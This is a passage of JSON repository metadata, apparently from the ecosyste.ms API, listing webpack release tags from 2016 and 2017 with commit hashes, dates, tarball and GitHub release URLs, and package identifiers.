ack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://git